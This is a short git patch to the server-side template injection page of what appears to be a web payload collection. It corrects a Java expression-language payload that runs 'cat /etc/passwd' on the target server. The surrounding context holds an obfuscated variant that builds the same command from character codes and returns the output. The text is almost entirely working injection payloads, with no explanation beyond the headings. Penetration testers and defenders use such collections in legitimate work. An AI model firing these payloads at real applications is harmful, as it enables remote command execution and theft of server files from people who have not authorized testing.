From 598d2ca3fac9e462b0cecfac114bd969b4ce61ee Mon Sep 17 00:00:00 2001
From: KeoOp <94304289+NaxnN@users.noreply.github.com>
Date: Wed, 7 Jun 2023 14:15:07 +0800
Subject: [PATCH] Update README.md

---
 Server Side Template Injection/README.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md
index fa54fd3..66d0219 100644
--- a/Server Side Template Injection/README.md	
+++ b/Server Side Template Injection/README.md	
@@ -377,7 +377,7 @@ ${T(java.lang.System).getenv()}
 ### Java - Retrieve /etc/passwd
 
 ```java
-${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}
+${T(java.lang.Runtime).getRuntime().exec('cat /etc/passwd')}
 
 ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
 ```